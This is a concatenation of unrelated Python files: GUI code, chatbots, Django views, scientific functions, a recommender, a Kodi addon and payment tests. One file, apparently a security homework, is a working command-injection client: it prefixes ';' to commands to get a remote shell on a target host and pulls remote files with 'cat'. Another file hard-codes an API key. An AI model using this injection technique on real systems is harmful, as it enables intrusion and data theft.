info_tree.insert('', "end", text="D_range", values=data, iid="dr" + str(i))
data = []
for i in range(len(init_data)):
data.append(init_data[i][9])
info_tree.insert('', "end", text="Path", values=data, iid="path" + str(i))
# for i in range(3):
# info_tree.insert('', "end", text="X", values=init_data[i][0], iid="x" + str(i))
# for i in range(3):
# info_tree.insert('', "end", text="Y", values=init_data[i][1], iid="y" + str(i))
# for i in range(len(init_data)):
# info_tree.insert('', "end", text="Now_d", values=init_data[i][2], iid="nd" + str(i))
# for i in range(len(init_data)):
# info_tree.insert('', "end", text="Total_d", values=init_data[i][3], iid="td" + str(i))
# for i in range(len(init_data)):
# info_tree.insert('', "end", text="T1_d", values=init_data[i][4], iid="1d" + str(i))
# for i in range(len(init_data)):
# info_tree.insert('', "end", text="T2_d", values=init_data[i][5], iid="2d" + str(i))
# for i in range(len(init_data)):
# info_tree.insert('', "end", text="T3_d", values=init_data[i][6], iid="3d" + str(i))
# for i in range(len(init_data)):
# info_tree.insert('', "end", text="Knot", values=init_data[i][7], iid="knot" + str(i))
# for i in range(len(init_data)):
# info_tree.insert('', "end", text="D_range", values=init_data[i][8], iid="dr" + str(i))
# for i in range(len(init_data)):
# info_tree.insert('', "end", text="Path", values=init_data[i][9], iid="path" + str(i))
return info_tree
|
5,112 | 15539d824490b7ae4724e7c11949aa1db25ecab2 | #!/user/bin/env python
# -*- coding: utf-8 -*-
# @Author : XordenLee
# @Time : 2019/2/1 18:51
import itchat
import requests
import sys
default_api_key = 'bb495c529b0e4efebd5d2632ecac5fb8'
def send(user_id, input_text, api_key=None):
if not api_key:
api_key = default_api_key
msg = {
"reqType": 0,
"perception": {
"inputText": {
"text": input_text
},
"selfInfo": {
"location": {
"city": "北京",
"province": "北京",
}
}
},
"userInfo": {
"apiKey": api_key,
"userId": user_id
}
}
return requests.post('http://openapi.tuling123.com/openapi/api/v2',json=msg).json()
@itchat.msg_register(itchat.content.TEXT)
def text_reply(msg):
print(msg.FromUserName[-9:], msg.text)
req = send(msg.FromUserName[1: 32], msg.text)
a = req.get('results')
b = a[0]['values']['text']
print(msg.get('ToUserName')[-9:],b)
return b
itchat.auto_login(hotReload=True)
itchat.run()
|
5,113 | 6c825cb60475a1570e048cab101567bd5847d2c2 | from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponseNotFound
from django.template import RequestContext
from bgame.models import Game, Period, Player, ROLES
from bgame.forms import GameForm
import logging
log = logging.getLogger(__name__)
def index(request):
games = Game.objects.all()
return render_to_response('index.html', {'games': games, 'roles': ROLES, 'form': GameForm},
context_instance=RequestContext(request))
def game(request, game_slug, role):
game_ = get_object_or_404(Game, game_slug=game_slug)
player = get_object_or_404(Player, game__game_slug=game_slug, role=role)
period = Period.objects.filter(player__game=game_).filter(player__role=role).order_by('-number')[0]
return render_to_response('game.html', {'game': game, 'player': player,
'period': period}, context_instance=RequestContext(request))
def html(request):
data = request.GET
if 'template' in data:
if data['template'] == 'game_listing':
games = Game.objects.all()
return render_to_response('game_listing.html', {'games': games, 'roles': ROLES,},
context_instance=RequestContext(request))
if data['template'] == 'period_listing':
periods = Period.objects.filter(player__game__game_slug=data['game_slug']).filter(player__role=data['role']).exclude(number=0).order_by('-number')
print 'number of periods found: %d' % (periods.count(),)
return render_to_response('period_listing.html', {'periods': periods}, context_instance=RequestContext(request))
print 'template not in data'
return HttpResponseNotFound()
|
5,114 | 789f95095346262a04e7de0f9f9c5df6177e8fbc | # -*- coding: utf-8 -*-
import json
from django.conf import settings
from pdf_generator.utils import build_pdf_stream_from
from django.http import JsonResponse
from helpers.views import ApiView
from pdf_generator.forms import PdfTempStoreForm
from pdf_generator.serializers import PdfTempStoreSerializer
class ReportPdfView(ApiView):
"""
PdfView
"""
def post(self, request, *args, **kwargs):
data = json.loads(request.body)
domain = data["domain"]
data = data["data"]
print("-- Build Report PDF Export --")
print()
# persist params in PdfTemp
store = PdfTempStoreForm({"data": data})
if store.is_valid():
store_instance = store.save()
else:
return JsonResponse({"error": "Pdf data is invalid"})
uuid = PdfTempStoreSerializer(store_instance).data["uuid"]
url = (
f"http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}"
)
# Early display pdf URL
if settings.DEBUG:
print(
"================================================================================"
)
print(url.replace("nginx", domain))
print(
"================================================================================"
)
pdf = build_pdf_stream_from(url)
store_instance.delete()
return pdf
|
5,115 | f9f66452756cb67689d33aeb2e77535086355a7d | import telebot
import os
from misc.answers import answer_incorrect, answer_correct, answer_start
from helper import get_challenge_text, get_solved_challenge_text, is_correct_answer
bot = telebot.TeleBot(os.environ.get('API_KEY_TELEGRAM'))
default_parse_mode = "Markdown"
@bot.message_handler(commands=['start'])
def welcome(message):
print("/start detected")
print("[------------------------------]")
bot.send_message(message.chat.id, answer_start)
@bot.message_handler(commands=['new_game'])
def new_game(message):
print(f"try new game with message: {message.text}")
answer = ""
try:
answer = get_challenge_text(message.text)
print("Challenge successfully created")
except ValueError as exception:
answer = exception
print(f"ValueError occurred: {exception}")
bot.send_message(message.chat.id, answer, parse_mode=default_parse_mode)
print("[------------------------------]")
@bot.message_handler(content_types=['text'])
def message_listener(message):
reply_message = message.reply_to_message
if reply_message is not None:
print(f"Try to answer with: {message.text}")
answer = ""
try:
if is_correct_answer(message.text, reply_message):
answer = answer_correct
solved_challenge = get_solved_challenge_text(reply_message.text)
# set challenge status
bot.edit_message_text(chat_id=reply_message.chat.id, message_id=reply_message.message_id,
text=solved_challenge,
parse_mode=default_parse_mode)
print("Correct answer")
else:
answer = answer_incorrect
print("Incorrect answer")
except Exception as exception:
answer = exception
print("Already solved")
print("[------------------------------]")
bot.reply_to(message, answer)
# RUN
print("Bot started!")
print("[------------------------------]")
bot.polling(none_stop=True)
|
5,116 | e0f25addad8af4541f1404b76d4798d2223d9715 | """
Use the same techniques such as (but not limited to):
1) Sockets
2) File I/O
3) raw_input()
from the OSINT HW to complete this assignment. Good luck!
"""
import socket
import re
import time
host = "cornerstoneairlines.co" # IP address here
port = 45 # Port here
def execute_cmd(cmd):
"""
Sockets: https://docs.python.org/2/library/socket.html
How to use the socket s:
# Establish socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
Reading:
data = s.recv(1024) # Receives 1024 bytes from IP/Port
print(data) # Prints data
Sending:
s.send("something to send\n") # Send a newline \n at the end of your command
"""
regex = re.match('^\s*(\w*)\s*([A-Za-z0-9.\/\-\_]*)\s*([A-Za-z0-9.\/\-\_]*)\s*$', cmd)
val = regex.group(1)
# print('val: %s' % val)
if val == 'shell':
path = '/'
while True:
usr_in = raw_input(path + ">")
if usr_in == 'exit':
break
command = ';' + ' cd ' + path + '; ' + usr_in
if ('cd' in usr_in):
# print('here')
reg = re.match('^\s*cd\s*([A-Za-z0-9.\/\-\_]*)\s*$', usr_in)
if (reg.group(1) == ''):
path = '/'
elif (reg.group(1)[0] == '/'):
path = reg.group(1)
else:
path += reg.group(1)
if (path[-1] != '/'):
path += '/'
# print('command: "%s"' % command)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
data = s.recv(1024)
time.sleep(2)
# print('%s' % data)
s.send(command + '\n')
time.sleep(2)
# print('"%s" sent' % command)
data = s.recv(1024)
print('%s' % data)
s.close()
elif val == 'pull':
command = '; ' + 'cat ' + regex.group(2)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
data = s.recv(1024)
time.sleep(2)
s.send(command + '\n')
time.sleep(2)
# print('"%s" sent' % command)
data = s.recv(1024)
# print('%s' % data)
s.close()
f = open(regex.group(3), 'w')
f.write(data)
f.close()
elif val == 'quit':
return -1
elif val == 'help':
print('shell - Drop into an interactive shell - exit with "exit"')
print('pull <remote path> <local path> - download files')
print('help - show the help menu')
print('quit - quit this program')
else:
print('invalid command')
return 0
if __name__ == '__main__':
while True:
cmd = raw_input('>')
if execute_cmd(cmd) == -1:
break
|
5,117 | 607f0aac0d6d2c05737f59803befcff37d559398 | #!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author: Jack
@datetime: 2018/8/31 13:32
@E-mail: zhangxianlei117@gmail.com
"""
def isValid(s):
stack = []
for ss in s:
if ss in '([{':
stack.append(ss)
if ss in ')]}':
if len(stack) <= 0:
return False
else:
compare = stack.pop()
if (compare == '(' and ss != ')') or (compare == '[' and ss != ']') or (compare == '{' and ss != '}'):
return False
if len(stack) == 0:
return True
else:
return False
if __name__ == '__main__':
print isValid("{[]}")
|
5,118 | ea3217be80b6d1d3a400139bc4a91870cd2f1d87 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 14 20:35:10 2020
@author: Johanna
"""
import numpy as np
###############################################################################
# Complex Visibility Functions
###############################################################################
def compute_vis(X, F):
vis = np.matmul(X, np.transpose(F)).astype(np.complex64)
return vis
def compute_vis_grad(vis, Z, F):
Z_vis = compute_vis(Z, F)
grad = -np.matmul(np.conjugate(F.T), vis - Z_vis)
return grad.real
def chisq_vis(vis, Z, F, sigma):
'''
Compute mean chi-squared of visibilities of Z.
'''
samples = compute_vis(Z, F)
chisq = np.sum(np.abs((samples-vis)/sigma)**2)/(2*len(vis))
return chisq
###############################################################################
# Visibility Amplitude Functions
###############################################################################
def compute_amp(X, F):
''' Given an image X and DFT matrix F, compute and return its
visibility amplitude. '''
amp = np.abs(np.dot(F, X))
return amp
def compute_amp_grad(amp, Z, A, sigma):
'''
Compute gradient of visibility amplitude.
'''
i1 = np.dot(A, Z)
amp_samples = np.abs(i1)
pp = ((amp - amp_samples) * amp_samples) / (sigma**2) / i1
out = (-2.0/len(amp)) * np.real(np.dot(pp, A))
return out
def chisq_amp(amp, Z, F, sigma):
''' Compute and return chi-squared of amplitude between X and Z. '''
amp_Z = compute_amp(Z, F)
chisq = np.sum(np.abs((amp - amp_Z)/sigma)**2)/len(amp)
return chisq
###############################################################################
# Closure Phase Functions
###############################################################################
def compute_cphase(X, F_cphase):
''' Given an image X and the DFT matrices from three baselines,
compute and return its closure phase. '''
# Get fourier matrices of each baseline
A1 = F_cphase[:, :, 0]
A2 = F_cphase[:, :, 1]
A3 = F_cphase[:, :, 2]
X = np.array(X)
# Compute observed closure phase of image
vis1 = np.matmul(X.reshape((1,-1)), np.transpose(A1)).astype(np.complex64)
vis2 = np.matmul(X.reshape((1,-1)), np.transpose(A2)).astype(np.complex64)
vis3 = np.matmul(X.reshape((1,-1)), np.transpose(A3)).astype(np.complex64)
cphase = np.angle(vis1 * vis2 * vis3)
return cphase
def compute_cphase_grad(cphase, Z, F_cphase, sigma, npix):
'''
Compute gradient of closure phase chi-squared
cphase : closure phase of true image
Z : predicted image vector
F_cphase : 3 DFT matrices from three baselines in a closure triangle
'''
# Get fourier matrices of each baseline
A1 = F_cphase[:, :, 0]
A2 = F_cphase[:, :, 1]
A3 = F_cphase[:, :, 2]
i1 = np.matmul(Z.reshape((1,-1)), np.transpose(A1)).astype(np.complex64)
i2 = np.matmul(Z.reshape((1,-1)), np.transpose(A2)).astype(np.complex64)
i3 = np.matmul(Z.reshape((1,-1)), np.transpose(A3)).astype(np.complex64)
cphase_samples = np.angle(i1 * i2 * i3)
pref = np.sin(cphase - cphase_samples)/(sigma**2)
pt1 = pref/i1
pt2 = pref/i2
pt3 = pref/i3
out = -(2.0/len(cphase)) * np.imag(np.dot(pt1, A1) + np.dot(pt2, A2) + np.dot(pt3, A3))
return out.reshape(npix**2)
def chisq_cphase(cphase, Z, F_cphase, sigma_cphase):
"""Closure Phase reduced chi-squared loss."""
cphase_samples = compute_cphase(Z, F_cphase)
chisq= (2.0/len(cphase)) * np.sum((1.0 - np.cos(cphase-cphase_samples))/(sigma_cphase**2))
return chisq
###############################################################################
# Closure Amplitude Functions
###############################################################################
def compute_camp(X, Amatrices):
'''
Compute closure amplitude of image vector X.
'''
i1 = np.dot(Amatrices[0], X)
i2 = np.dot(Amatrices[1], X)
i3 = np.dot(Amatrices[2], X)
i4 = np.dot(Amatrices[3], X)
camp = np.abs((i1 * i2)/(i3 * i4))
return camp
def compute_camp_grad(camp, Z, Amatrices, sigma):
"""
The gradient of the closure amplitude chi-squared
camp: Closure amplitudes of true image
Z: Predicted image vector
Amatrices: DFT matrices of four baselines
"""
i1 = np.dot(Amatrices[0], Z)
i2 = np.dot(Amatrices[1], Z)
i3 = np.dot(Amatrices[2], Z)
i4 = np.dot(Amatrices[3], Z)
camp_samples = np.abs((i1 * i2)/(i3 * i4))
pp = ((camp - camp_samples) * camp_samples)/(sigma**2)
pt1 = pp/i1
pt2 = pp/i2
pt3 = -pp/i3
pt4 = -pp/i4
out = (np.dot(pt1, Amatrices[0]) +
np.dot(pt2, Amatrices[1]) +
np.dot(pt3, Amatrices[2]) +
np.dot(pt4, Amatrices[3]))
return (-2.0/len(camp)) * np.real(out)
def chisq_camp(camp, Z, Amatrices, sigma):
"""Closure Amplitudes reduced chi-squared loss."""
i1 = np.dot(Amatrices[0], Z)
i2 = np.dot(Amatrices[1], Z)
i3 = np.dot(Amatrices[2], Z)
i4 = np.dot(Amatrices[3], Z)
camp_samples = np.abs((i1 * i2)/(i3 * i4))
chisq = np.sum(np.abs((camp - camp_samples)/sigma)**2)/len(camp)
return chisq
###############################################################################
# Log Closure Amplitude Functions
###############################################################################
def compute_lgcamp(X, Amatrices):
''' Compute log closure amplitude of image vector X '''
a1 = np.abs(np.dot(Amatrices[0], X))
a2 = np.abs(np.dot(Amatrices[1], X))
a3 = np.abs(np.dot(Amatrices[2], X))
a4 = np.abs(np.dot(Amatrices[3], X))
lgcamp = np.log(a1) + np.log(a2) - np.log(a3) - np.log(a4)
return lgcamp
def compute_lgcamp_grad(lgcamp, Z, Amatrices, sigma):
"""The gradient of the Log closure amplitude chi-squared"""
i1 = np.dot(Amatrices[0], Z)
i2 = np.dot(Amatrices[1], Z)
i3 = np.dot(Amatrices[2], Z)
i4 = np.dot(Amatrices[3], Z)
lgcamp_samples = (np.log(np.abs(i1)) +
np.log(np.abs(i2)) -
np.log(np.abs(i3)) -
np.log(np.abs(i4)))
pp = (lgcamp - lgcamp_samples) / (sigma**2)
pt1 = pp / i1
pt2 = pp / i2
pt3 = -pp / i3
pt4 = -pp / i4
out = (np.dot(pt1, Amatrices[0]) +
np.dot(pt2, Amatrices[1]) +
np.dot(pt3, Amatrices[2]) +
np.dot(pt4, Amatrices[3]))
return (-2.0/len(lgcamp)) * np.real(out)
def chisq_lgcamp(lgcamp, X, Amatrices, sigma):
"""Log Closure Amplitudes reduced chi-squared"""
a1 = np.abs(np.dot(Amatrices[0], X))
a2 = np.abs(np.dot(Amatrices[1], X))
a3 = np.abs(np.dot(Amatrices[2], X))
a4 = np.abs(np.dot(Amatrices[3], X))
samples = np.log(a1) + np.log(a2) - np.log(a3) - np.log(a4)
chisq = np.sum(np.abs((lgcamp - samples)/sigma)**2) / (len(lgcamp))
return chisq
|
5,119 | 7f52354487f85a0bf1783c8aa76f228ef17e6d6b | import datetime
import pendulum
import requests
from prefect import task, Flow, Parameter
from prefect.engine.signals import SKIP
from prefect.tasks.notifications.slack_task import SlackTask
from prefect.tasks.secrets import Secret
city = Parameter(name="City", default="San Jose")
api_key = Secret("WEATHER_API_KEY")
@task(max_retries=2, retry_delay=datetime.timedelta(seconds=5))
def pull_forecast(city, api_key):
"""
Extract the 5-day 3-hour forecast for the provided City.
"""
base_url = "http://api.openweathermap.org/data/2.5/forecast?"
url = base_url + "appid=" + api_key + "&q=" + city
r = requests.get(url)
r.raise_for_status()
data = r.json()
return data
@task
def is_raining_tomorrow(data):
"""
Given a list of hourly forecasts, returns a boolean specifying
whether there is rain in tomorrow's forecast.
"""
pendulum.now("utc").add(days=1).strftime("%Y-%m-%d")
rain = [
w
for forecast in data["list"]
for w in forecast["weather"]
if w["main"] == "Rain" and forecast["dt_txt"].startswith(tomorrow)
]
if not bool(rain):
raise SKIP("There is no rain in the forecast for tomorrow.")
notification = SlackTask(
message="There is rain in the forecast for tomorrow - better take your umbrella out!",
webhook_secret="DAVID_SLACK_URL",
)
with Flow("Umbrella Flow") as flow:
forecast = pull_forecast(city=city, api_key=api_key)
rain = is_raining_tomorrow(forecast)
notification.set_upstream(rain)
|
5,120 | 15bcfd8859322034ec76a8c861d2151153ab54af | import sys
import urllib
import urlparse
import xbmcgui
import xbmcplugin
import xbmcaddon
import shutil
from shutil import copyfile
base_url = sys.argv[0]
addon_handle = int(sys.argv[1])
args = urlparse.parse_qs(sys.argv[2][1:])
addon = xbmcaddon.Addon()
xbmcplugin.setContent(addon_handle, 'videos')
def build_url(query):
return base_url + '?' + urllib.urlencode(query)
xxxmenu = xbmcaddon.Addon('plugin.video.xxxmenu')
addon_icon = 'special://home/addons/plugin.video.xxxmenu/icon.png'
recycle_icon = 'special://home/addons/plugin.video.xxxmenu/recycle.png'
pandamovies_icon = 'special://home/addons/plugin.video.xxxmenu/pandamovie.png'
mangoporn_icon = 'special://home/addons/plugin.video.xxxmenu/mangoporn.png'
streamingporn_icon = 'special://home/addons/plugin.video.xxxmenu/streamingporn.png'
sexkino_icon = 'special://home/addons/plugin.video.xxxmenu/sexkino.png'
pornkino_icon = 'special://home/addons/plugin.video.xxxmenu/pornkino.png'
sexuria_icon = 'special://home/addons/plugin.video.xxxmenu/sexuria.png'
mode = args.get('mode', None)
if mode is None:
url = build_url({'mode': 'xxxmenu', 'foldername': '[COLOR blue][B]XXX MENU[/B][/COLOR]'})
li = xbmcgui.ListItem('[COLOR blue][B]XXX MENU[/B][/COLOR]', iconImage=addon_icon)
li.setInfo(type='video', infoLabels={'plot': '[COLOR blue][B]XXX MENU[/B][/COLOR]'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'mangoporn', 'foldername': 'Mangoporn'})
li = xbmcgui.ListItem('Mangoporn', iconImage=mangoporn_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.mangoporn.net'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'pandamovies', 'foldername': 'Pandamovies'})
li = xbmcgui.ListItem('Pandamovies', iconImage=pandamovies_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.pandamovies.pw'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'pornkino', 'foldername': 'Pornkino'})
li = xbmcgui.ListItem('Pornkino', iconImage=pornkino_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.pornkino.to'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'sexkino', 'foldername': 'Sexkino'})
li = xbmcgui.ListItem('Sexkino', iconImage=sexkino_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.sexkino.to'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'sexuria', 'foldername': 'Sexuria'})
li = xbmcgui.ListItem('Sexuria', iconImage=sexuria_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.sexuria.com'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'streamingporn', 'foldername': 'Streamingporn'})
li = xbmcgui.ListItem('Streamingporn', iconImage=streamingporn_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.streamingporn.xyz'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'clean', 'foldername': 'Clear [COLOR blue][B]XXX MENU[/B][/COLOR] cache'})
li = xbmcgui.ListItem('Clear [COLOR blue][B]XXX MENU[/B][/COLOR] cache', iconImage=recycle_icon)
li.setInfo(type='video', infoLabels={'plot': 'Clear [COLOR blue][B]XXX MENU[/B][/COLOR] cache'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
xbmcplugin.endOfDirectory(addon_handle)
elif mode[0] == 'xxxmenu':
xbmc.executebuiltin('Container.Refresh')
elif mode[0] == 'pandamovies':
xbmc.executebuiltin('RunAddon(plugin.video.pandamovies.pw)')
elif mode[0] == 'mangoporn':
xbmc.executebuiltin('RunAddon(plugin.video.mangoporn.net)')
elif mode[0] == 'streamingporn':
xbmc.executebuiltin('RunAddon(plugin.video.streamingporn.xyz)')
elif mode[0] == 'sexkino':
xbmc.executebuiltin('RunAddon(plugin.video.sexkino.to)')
elif mode[0] == 'pornkino':
xbmc.executebuiltin('RunAddon(plugin.video.pornkino.to)')
elif mode[0] == 'sexuria':
xbmc.executebuiltin('RunAddon(plugin.video.sexuria.com)')
elif mode[0] == 'clean':
tmp_path = xbmc.translatePath("special://userdata/addon_data/plugin.video.xxxmenu/tmp/").decode("utf-8")
try:
shutil.rmtree(tmp_path, ignore_errors=True)
except:
pass
xbmc.executebuiltin('Notification([COLOR blue][B]XXX MENU[/B][/COLOR], Cache successfully cleared., 5000, %s)' % (addon_icon))
xbmc.executebuiltin('Container.Refresh')
|
5,121 | 8cdd7646dbf23259e160186f332b5cb02b67291b | # Generated by Django 2.2.3 on 2019-07-11 22:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app1', '0002_property_details'),
]
operations = [
migrations.AlterField(
model_name='property_details',
name='flat_type',
field=models.CharField(choices=[('1', '1BHK'), ('2', '2BHK'), ('3', '3BHK')], max_length=20),
),
migrations.AlterField(
model_name='property_details',
name='possession',
field=models.CharField(choices=[('1', 'ready to move'), ('2', 'work on progress')], max_length=20),
),
migrations.AlterField(
model_name='property_details',
name='price_range',
field=models.CharField(choices=[('1', '$5000'), ('2', '$15,000'), ('3', '$25,000'), ('4', '$40,000'), ('5', '$50,000')], max_length=50),
),
]
|
5,122 | 5c8de06176d06c5a2cf78ac138a5cb35e168d617 | import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import TruncatedSVD
from sklearn.metrics.pairwise import cosine_similarity
def get_df_4_model(user_id, n_recommendations = 20000):
'''this function generates the latent dataframes used for the prediction model'''
# First the data needs to be loaded
print('Generating dataframe for recommendation model')
recipes_df_raw = pd.read_csv("data/preprocessed/recipe_pp_20201118_1206.csv")#.sample(n=n_recommendations, random_state=1)
reviews_df_raw = pd.read_csv("data/preprocessed/review_pp_20201118_1206.csv")
print(f'{len(recipes_df_raw.ingredients)} recipes are being considered for recommendation')
# !! currently the df is way to big, so we need to take a sample, but ensure that the recipes the user likes are used for finding similarities later
# For this I will create a sample df without user recipes and concatenate the a df with only user liked recipes
user_rates =list(reviews_df_raw[reviews_df_raw.user_id == user_id].recipe_id) # generate a list of user rated recipes
sample_df_no_user = recipes_df_raw[~recipes_df_raw.recipe_id.isin(user_rates)].sample(n=n_recommendations, random_state=1)
recipe_df_w_user = recipes_df_raw[recipes_df_raw.recipe_id.isin(user_rates)]
recipes_df_user = pd.concat([sample_df_no_user, recipe_df_w_user], axis=0)
merge_df = pd.merge(recipes_df_user[['recipe_id', 'metadata']], reviews_df_raw, on="recipe_id", how="right").dropna()
recipes_df = merge_df[['recipe_id', 'metadata']].groupby(by="recipe_id").first().reset_index()
reviews_df = merge_df.drop(['metadata'], axis="columns").reset_index()
print(len(user_rates))
print(sample_df_no_user.shape)
#Using CountVectorizer to encode metadata into column
count = CountVectorizer(stop_words='english')
count_matrix = count.fit_transform(recipes_df['metadata'])
#Create a new dataframe count_df with the vectors you get from this count transformation.
count_df = pd.DataFrame(count_matrix.toarray(), index=recipes_df.recipe_id.tolist())
#reduce dimensionality
n_red = 250 # reduction factor
svd = TruncatedSVD(n_components=n_red)
latent_df = svd.fit_transform(count_df)
n = n_red
latent_df = pd.DataFrame(latent_df[:,0:n], index=recipes_df.recipe_id.tolist())
latent_df
# start recommendin similar recipes on the basis of user ratings (item-item collaborative filtering
#### -> old: ratings = reviews_df.pivot(index = 'recipe_id', columns ='user_id', values = 'rating').fillna(0)
#
ratings1 = pd.merge(recipes_df[['recipe_id']], reviews_df, on="recipe_id", how="right")
ratings = ratings1.pivot(index = 'recipe_id', columns ='user_id', values = 'rating').fillna(0)
svd = TruncatedSVD(n_components=800)
latent_df_2 = svd.fit_transform(ratings)
index_list = reviews_df.groupby(by="recipe_id").mean().index.tolist()
latent_df_2 = pd.DataFrame(latent_df_2, index=index_list)
latent_df.to_csv(f'data/latents/latent_content.csv', index=True)
latent_df_2.to_csv(f'data/latents/latent_rating.csv', index=True)
return latent_df, latent_df_2, user_rates
def get_one_recommendation(recipe_id, latent_1, latent_2, n_recommendations):
# applying Cosine similarity
# Get the latent vectors for recipe_id:"45119" from content and collaborative matrices
v1 = np.array(latent_1.loc[recipe_id]).reshape(1, -1)
v2 = np.array(latent_2.loc[recipe_id]).reshape(1, -1)
# Compute the cosine similartity of this movie with the others in the list
sim1 = cosine_similarity(latent_1, v1).reshape(-1)
sim2 = cosine_similarity(latent_2, v2).reshape(-1)
hybrid = ((sim1 + sim2)/2.0)
dictDf = {'content': sim1 , 'collaborative': sim2, 'hybrid': hybrid}
recommendation_df = pd.DataFrame(dictDf, index = latent_1.index)
recommendation_df.sort_values('hybrid', ascending=False, inplace=True)
recommendation_df.head(10)
return recommendation_df.head(n_recommendations).reset_index().rename(columns={"index":"recipe_id"})
def get_user_recommendations(user_id, n_recommendations = 500):
'''thi function gets the recommendations fo one user by taking all of its liked and disliked dishes,
getting the recommendation based on each recipe and then summing the scores'''
# !!!!!!!!!! this function still assumes the user ONLY liked recipes
# !!!!!!!!!! No dislikes are considered so far!
latent_1, latent_2, recipe_list = get_df_4_model(user_id)#, n_recommendations)
recommendations = [get_one_recommendation(i, latent_1, latent_2, n_recommendations) for i in recipe_list]# actual_list]
#concetenate the list to a big df
recommendations_df=pd.concat(recommendations)
# sum the scores using groupby
grouped_recommendations= recommendations_df.groupby(by="recipe_id").sum().sort_values(by="hybrid", ascending=False)
return grouped_recommendations
#return recipe_list
def get_superuser_recommendation(n_recommendations=100):
user_id = 424680
latent_1, latent_2, recipe_list = get_df_4_model(user_id, n_recommendations)
recipe_list = recipe_list[0:10]
recommendations = [get_one_recommendation(i, latent_1, latent_2, n_recommendations) for i in recipe_list]# actual_list]
#concetenate the list to a big df
recommendations_df=pd.concat(recommendations)
# sum the scores using groupby
grouped_recommendations= recommendations_df.groupby(by="recipe_id").sum().sort_values(by="hybrid", ascending=False)
print(f'The recommendation results are based on {len(recipe_list)} recipes the user liked or disliked')
return grouped_recommendations[0:30]
if __name__ == "__main__":
result = get_superuser_recommendation(n_recommendations=4000)
print('Here are the top results for the user:')
print(result)
|
5,123 | 9155b3eed8ac79b94a033801dbf142392b50720b | from bs4 import BeautifulSoup
from cybersource.constants import CHECKOUT_BASKET_ID, CHECKOUT_ORDER_NUM, CHECKOUT_SHIPPING_CODE, CHECKOUT_ORDER_ID
from cybersource.tests import factories as cs_factories
from decimal import Decimal as D
from django.core import mail
from django.core.urlresolvers import reverse
from mock import patch
from oscar.core.loading import get_class, get_model
from oscar.test import factories
from random import randrange
from rest_framework.test import APITestCase
import datetime
import requests # Needed for external calls!
Basket = get_model('basket', 'Basket')
Product = get_model('catalogue', 'Product')
Order = get_model('order', 'Order')
class BaseCheckoutTest(APITestCase):
fixtures = ['cybersource-test.yaml']
def create_product(self, price=D('10.00')):
product = factories.create_product(
title='My Product',
product_class='My Product Class')
record = factories.create_stockrecord(
currency='USD',
product=product,
num_in_stock=10,
price_excl_tax=price)
factories.create_purchase_info(record)
return product
def do_add_to_basket(self, product_id, quantity=1):
url = reverse('api-basket-add-product')
data = {
"url": reverse('product-detail', args=[product_id]),
"quantity": quantity
}
return self.client.post(url, data)
def do_get_basket(self):
url = reverse('api-basket')
return self.client.get(url)
def do_sign_auth_request(self, basket_id=None, data=None):
if data is None:
data = {
"guest_email": "herp@example.com",
"basket": reverse('basket-detail', args=[basket_id]),
"shipping_address": {
"first_name": "fadsf",
"last_name": "fad",
"line1": "234 5th Ave",
"line4": "Manhattan",
"postcode": "10001",
"state": "NY",
"country": reverse('country-detail', args=['US']),
"phone_number": "+1 (717) 467-1111",
}
}
url = reverse('cybersource-sign-auth-request')
res = self.client.post(url, data, format='json')
self.assertEqual(res.status_code, 200)
next_year = datetime.date.today().year + 1
cs_data = {
'card_type': '001',
'card_number': '4111111111111111',
'card_cvn': '123',
'card_expiry_date': '12-{}'.format(next_year),
'bill_to_forename': 'Testy',
'bill_to_surname': 'McUnitTest',
'bill_to_address_line1': '234 5th Ave',
'bill_to_address_line2': 'apt 5',
'bill_to_address_city': 'Manhattan',
'bill_to_address_state': 'NY',
'bill_to_address_postal_code': '10001',
'bill_to_address_country': 'US',
'bill_to_phone': '17174671111',
}
for field in res.data['fields']:
if not field['editable'] or field['key'] not in cs_data:
cs_data[field['key']] = field['value']
cs_url = res.data['url']
return cs_url, cs_data
def do_cybersource_post(self, cs_url, cs_data):
res = requests.post(cs_url, cs_data)
self.assertEqual(res.status_code, 200)
soup = BeautifulSoup(res.content, 'html.parser')
form_data = {}
for element in soup.find_all('input'):
form_data[element['name']] = element['value']
# We have the data from cybersource, send it to our cybersource callback
url = reverse('cybersource-reply')
return self.client.post(url, form_data)
